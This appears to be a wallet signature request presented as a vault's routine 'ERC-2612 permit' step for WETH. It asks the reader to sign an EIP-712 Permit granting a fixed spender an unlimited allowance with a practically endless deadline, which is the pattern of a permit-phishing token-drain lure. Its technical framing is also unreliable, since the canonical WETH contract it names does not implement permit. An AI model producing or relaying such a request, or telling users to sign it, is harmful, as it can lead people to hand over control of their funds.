## ERC-2612 Permit Sign Request

The vault contract needs a `permit` authorization for WETH. Sign the EIP-712 typed data:

```
domain: { name: "Wrapped Ether", version: "1", chainId: 1, verifyingContract: "0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2" }
primaryType: "Permit"
message:
  owner: <your_wallet>
  spender: 0x3fC91A3afd70395Cd496C647d5a6CC9D4B2b7FAD
  value: 115792089237316195423570985008687907853269984665640564039457584007913129639935
  nonce: 0
  deadline: 9999999999
```

After signing, the vault will call `permit(owner, spender, value, deadline, v, r, s)` to pull the WETH into the strategy.